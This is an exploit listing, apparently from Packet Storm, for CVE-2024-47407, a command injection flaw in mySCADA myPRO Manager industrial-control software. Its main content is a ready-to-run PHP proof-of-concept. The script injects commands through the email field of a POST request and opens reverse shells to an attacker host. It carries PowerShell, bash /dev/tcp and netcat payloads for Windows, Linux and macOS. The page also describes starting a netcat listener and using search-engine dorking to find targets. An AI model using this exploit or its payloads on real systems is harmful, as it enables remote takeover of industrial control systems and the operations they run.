📄 MySCADA MyPRO Manager 1.2 PHP Code Injection

🗓️ 05 Feb 2026 00:00:00Reported by indoushkaType

packetstorm🔗 packetstorm.news👁 119 Views

CVE-2024-47407 PHP code injection in MySCADA MyPRO Manager 1.2 via POST to /get enabling remote shell.

Reporter	Title	Published	Views	Family All 14
Circl	CVE-2024-47407	21 Nov 202411:00	–	circl
CNNVD	mySCADA myPRO 操作系统命令注入漏洞	22 Nov 202400:00	–	cnnvd
CNVD	mySCADA myPRO Manager Operating System Command Injection Vulnerability	25 Nov 202400:00	–	cnvd
CVE	CVE-2024-47407	22 Nov 202422:15	–	cve
Cvelist	CVE-2024-47407 mySCADA myPRO OS Command Injection	22 Nov 202422:15	–	cvelist
Metasploit	mySCADA myPRO Manager Unauthenticated Command Injection (CVE-2024-47407)	11 Feb 202518:55	–	metasploit
Tenable Nessus	mySCADA PRO Manager Command Injection (CVE-2024-47407)	28 Jan 202500:00	–	nessus
NVD	CVE-2024-47407	22 Nov 202423:15	–	nvd
Packet Storm	MySCADA MyPRO Manager 1.2 Command Injection	11 Feb 202500:00	–	packetstorm
Packet Storm	📄 MyPRO Manager 1.2 Command Injection	30 Jan 202600:00	–	packetstorm

=============================================================================================================================================
    | # Title     : MySCADA MyPRO Manager 1.2 PHP Code Injection Vulnerability                                                                  |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
    | # Vendor    : https://www.myscada.org/mypro/                                                                                              |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking İn Google Or Other Search Enggine.
    
    [+] Code Description:
        
    	PHP Code Injection Vulnerability in mySCADA myPRO Manager versions up to v1.2, aka CVE-2024-47407.
    	
    	Send an HTTP POST request to /get with the email data containing the command to be executed. 
    	
    	Check if the response is 200, meaning the command was executed successfully.
    	
    	Before running the code, open a Netcat window on your attacking machine and listen for connections on the specified port: nc -lvnp ATTACKER_PORT
    	
    	(Related : https://packetstorm.news/files/id/189175/ Related CVE numbers: 	CVE-2024-47407 ) .
    	
    [+] save code as poc.php .
    
    [+] Set Target : line 4 + 5 + 6
    
    [+] USage : php poc.php 
    
    [+] PayLoad :
    
    <?php
    // by indoushka
    // استغلال CVE-2024-47407 في mySCADA myPRO Manager للحصول على Shell Reverse على أنظمة تشغيل مختلفة
    
    $target = "http://target-ip:34022/get"; // استبدل بـ IP الضحية
    $attacker_ip = "ATTACKER_IP"; // استبدل بـ IP المهاجم
    $attacker_port = "ATTACKER_PORT"; // استبدل بالمنفذ الذي ستستمع عليه
    
    // كشف نظام التشغيل وتنفيذ الحمولة المناسبة
    $windows_payload = "powershell -NoP -NonI -W Hidden -Exec Bypass -Command \"\$client = New-Object System.Net.Sockets.TCPClient('$attacker_ip',$attacker_port); \$stream = \$client.GetStream(); [byte[]]\$bytes = 0..65535|%{0}; while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i); \$sendback = (iex \$data 2>&1 | Out-String ); \$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> '; \$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2); \$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()}; \$client.Close()\"";
    
    $linux_payload = "/bin/bash -c 'bash -i >& /dev/tcp/$attacker_ip/$attacker_port 0>&1'";
    
    $mac_payload = "osascript -e 'do shell script \"nc -e /bin/bash $attacker_ip $attacker_port\"'";
    
    // تجهيز البريد الإلكتروني لاستغلال حقن الأوامر
    $email_injection = rand(100, 999) . "@" . rand(1000, 9999) . ".com&&";
    
    $email_injection .= "if exist C:\\Windows\\System32\\ cmd /c \"$windows_payload\"";
    $email_injection .= "; if [ -f /bin/bash ]; then $linux_payload; fi";
    $email_injection .= "; if [ -f /usr/bin/osascript ]; then $mac_payload; fi";
    $email_injection .= " #";
    
    // إعداد بيانات الطلب
    $data = json_encode([
        "command" => "testEmail",
        "email" => $email_injection
    ]);
    
    // إرسال الطلب
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $target);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_HTTPHEADER, ["Content-Type: application/json"]);
    
    $response = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    
    // التحقق من نجاح الاستغلال
    if ($http_code == 200) {
        echo "[+] تم إرسال حمولة Shell Reverse بنجاح! انتظر الاتصال على المنفذ $attacker_port\n";
    } else {
        echo "[-] فشل التنفيذ، ربما النظام محمي.\n";
    }
    ?>
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================

05 Feb 2026 00:00Current

5.5Medium risk

Vulners AI Score5.5

CVSS 410

CVSS 3.110

EPSS0.74727

SSVC